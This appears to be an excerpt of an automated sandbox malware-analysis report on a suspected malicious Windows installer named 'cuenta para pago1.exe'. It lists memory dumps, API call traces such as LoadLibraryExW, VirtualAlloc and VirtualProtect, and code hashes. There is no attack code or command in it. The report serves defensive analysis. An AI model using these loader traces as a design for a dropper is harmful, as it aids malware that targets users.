                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
                                                                                      • Instruction ID: 36932640a45318c75a18aff77ab64511548531c3f0ac059ca6f487157756e1a6
                                                                                      • Opcode Fuzzy Hash: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
                                                                                      • Instruction Fuzzy Hash: DB816831D04229DBDB24CFA8D8447ADBBB0FF44305F15816AE856BB2C0C7785A96CF44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00401FEE
                                                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                                                        • Part of subcall function 00405179: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00403160), ref: 004051D4
                                                                                        • Part of subcall function 00405179: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll), ref: 004051E6
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                                                      • LoadLibraryExW.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00401FFF
                                                                                      • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 0040207C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 334405425-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00401BA7
                                                                                      • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BB9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocFree
                                                                                      • String ID: Call
                                                                                      • API String ID: 3394109436-1824292864
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsqE113.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3677997916-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseDeleteOpenValue
                                                                                      • String ID:
                                                                                      • API String ID: 849931509-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: ShowWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1268545403-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                                                        • Part of subcall function 00406384: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040639B
                                                                                        • Part of subcall function 00406384: wsprintfW.USER32 ref: 004063D6
                                                                                        • Part of subcall function 00406384: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004063EA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2547128583-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • ShowWindow.USER32(00000000,00000000,?), ref: 00401DF2
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnableShow
                                                                                      • String ID:
                                                                                      • API String ID: 1136574915-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\cuenta para pago1.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00405BF3
                                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00405C15
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCreate
                                                                                      • String ID:
                                                                                      • API String ID: 415043291-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,0040325D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004056CB
                                                                                      • GetLastError.KERNEL32 ref: 004056D9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1375471231-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • VirtualAlloc.KERNELBASE(00000000), ref: 10002963
                                                                                      • GetLastError.KERNEL32 ref: 10002A6A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4068876231.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4068842862.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.4068909846.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.4068953066.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocErrorLastVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 497505419-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 0040168E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileMove
                                                                                      • String ID:
                                                                                      • API String ID: 3562171763-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                                                        • Part of subcall function 00405F61: wsprintfW.USER32 ref: 00405F6E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointerwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 327478801-0
                                                                                      • Opcode ID: 390f2af81ab463b3cbd4013dd9a57b5a130c00408a04b447ab1cf3b55cc0eeb8
                                                                                      • Instruction ID: 1be42fce3669e14aef02856632b8c3fd6eb27c701acbe6074d6f00ab1ddd0ca8
                                                                                      • Opcode Fuzzy Hash: 390f2af81ab463b3cbd4013dd9a57b5a130c00408a04b447ab1cf3b55cc0eeb8
                                                                                      • Instruction Fuzzy Hash: 30E04F71B05515EBDB11AFA59E4ADAF776AEB40329B14043BF101F00E1C67D8C419A3E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileStringWrite
                                                                                      • String ID:
                                                                                      • API String ID: 390214022-0
                                                                                      • Opcode ID: 981c7979ba822dccdb72df52fcfe6b7f87be0c37e1a4f4794e53a06bb608896e
                                                                                      • Instruction ID: 149acb2e4c8d2ab334bf79ea3f96ce17df26442c265e53a7283cdf21b2f65ea8
                                                                                      • Opcode Fuzzy Hash: 981c7979ba822dccdb72df52fcfe6b7f87be0c37e1a4f4794e53a06bb608896e
                                                                                      • Instruction Fuzzy Hash: B3E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB511B66C6D5FC1D4146A9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401741
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: PathSearch
                                                                                      • String ID:
                                                                                      • API String ID: 2203818243-0
                                                                                      • Opcode ID: eaacdd191c7eea98fc74c72ee0c8fabea13cd959233ea4d6937bd7f6f4107858
                                                                                      • Instruction ID: 3ece1a6015159183f920534ecfc8dbbbdcbcaab1af18821eb087b1273417be7a
                                                                                      • Opcode Fuzzy Hash: eaacdd191c7eea98fc74c72ee0c8fabea13cd959233ea4d6937bd7f6f4107858
                                                                                      • Instruction Fuzzy Hash: C1E08672304100EBD750CFA4DE49AAA77ACDF403B8F20457BF615E61D1E6B49A41973D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040321F,00000000,00000000,00403076,000000FF,00000004,00000000,00000000,00000000), ref: 00405C86
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID:
                                                                                      • API String ID: 2738559852-0
                                                                                      • Opcode ID: a00b84ef068ec3340bdddd9f42ca8c04165d68640cb73732be2406276cbef438
                                                                                      • Instruction ID: ef4ecac980915e2f81eec60b371ea7b66f7146230b2cbae24b16510ac7dd1765
                                                                                      • Opcode Fuzzy Hash: a00b84ef068ec3340bdddd9f42ca8c04165d68640cb73732be2406276cbef438
                                                                                      • Instruction Fuzzy Hash: 53E0EC3265835AABEF109E659C08AEB7B6CEB05360F004432F915E6190D271E8219BA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      • Opcode ID: 47bb742b83de058295ea66ad7c8c51c1fc329d8dacee4bb1f88cf71d1c5c0238
                                                                                      • Instruction ID: 2fd216668262c1d23633d06d3759517c993b1d1f21998de780648112abb91376
                                                                                      • Opcode Fuzzy Hash: 47bb742b83de058295ea66ad7c8c51c1fc329d8dacee4bb1f88cf71d1c5c0238
                                                                                      • Instruction Fuzzy Hash: 64E08676244108BFDB00DFA4DD47FD577ECEB44700F004421BA08D7091C774E5408768
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004031ED,00000000,0040BEA0,?,0040BEA0,?,000000FF,00000004,00000000), ref: 00405CB5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      • Opcode ID: 00c0377323aa53eb430c82b83f01e62a2601c7c92c94a0140a128221a0f71a88
                                                                                      • Instruction ID: ba43a9b4bceeecaa6f2f3e0d34fbf098cac3b3b9582c4b6c2afca3054f4c0e18
                                                                                      • Opcode Fuzzy Hash: 00c0377323aa53eb430c82b83f01e62a2601c7c92c94a0140a128221a0f71a88
                                                                                      • Instruction Fuzzy Hash: 53E08632114319ABDF105E509C40EEB3B6CEB00350F004432F915E3180D231F8219BA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4068876231.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4068842862.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.4068909846.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.4068953066.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                      • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                      • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                      • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402310
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileString
                                                                                      • String ID:
                                                                                      • API String ID: 1096422788-0
                                                                                      • Opcode ID: e95e7b58a01c094ed04e695a4ca6ba6fac99f72604aa6d91b41b78e2544a399b
                                                                                      • Instruction ID: 8b162ba546b3877e829776e4b8c3d619a2c74ac71086561365c339888b8acfb9
                                                                                      • Opcode Fuzzy Hash: e95e7b58a01c094ed04e695a4ca6ba6fac99f72604aa6d91b41b78e2544a399b
                                                                                      • Instruction Fuzzy Hash: 61E04F30800204BBDF01AFA4CE49DBD3B79AB00344F14043AF900AB1D5E7F89A809749
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040413C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000028,?,?,00403F3F), ref: 00404121
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00403230
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00403ED8), ref: 0040410A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CallbackDispatcherUser
                                                                                      • String ID:
                                                                                      • API String ID: 2492992576-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404B0D
                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404B18
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B62
                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404B75
                                                                                      • SetWindowLongW.USER32(?,000000FC,004050ED), ref: 00404B8E
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BA2
                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BB4
                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404BCA
                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BD6
                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404BE8
                                                                                      • DeleteObject.GDI32(00000000), ref: 00404BEB
                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C16
                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C22
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CB8
                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CE3
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF7
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404D26
                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D34
                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404D45
                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E42
                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EA7
                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EBC
                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EE0
                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F00
                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404F15
                                                                                      • GlobalFree.KERNEL32(?), ref: 00404F25
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404F9E
                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00405047
                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405056
                                                                                      • InvalidateRect.USER32(?,00000000,?), ref: 00405076
                                                                                      • ShowWindow.USER32(?,00000000), ref: 004050C4
                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 004050CF
                                                                                      • ShowWindow.USER32(00000000), ref: 004050D6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                      • String ID: $M$N
                                                                                      • API String ID: 1638840714-813528018
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 004045C8
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 004045F2
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 004046A3
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 004046AE
                                                                                      • lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 004046E0
                                                                                      • lstrcatW.KERNEL32(?,Call), ref: 004046EC
                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046FE
                                                                                        • Part of subcall function 00405743: GetDlgItemTextW.USER32(?,?,00000400,00404735), ref: 00405756
                                                                                        • Part of subcall function 004062AE: CharNextW.USER32(?,*?|<>/":,00000000,00000000,77573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\cuenta para pago1.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406311
                                                                                        • Part of subcall function 004062AE: CharNextW.USER32(?,?,?,00000000), ref: 00406320
                                                                                        • Part of subcall function 004062AE: CharNextW.USER32(?,00000000,77573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\cuenta para pago1.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406325
                                                                                        • Part of subcall function 004062AE: CharPrevW.USER32(?,?,77573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\cuenta para pago1.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406338
                                                                                      • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,?,004206B8,?,?,000003FB,?), ref: 004047C1
                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047DC
                                                                                        • Part of subcall function 00404935: lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
                                                                                        • Part of subcall function 00404935: wsprintfW.USER32 ref: 004049DF
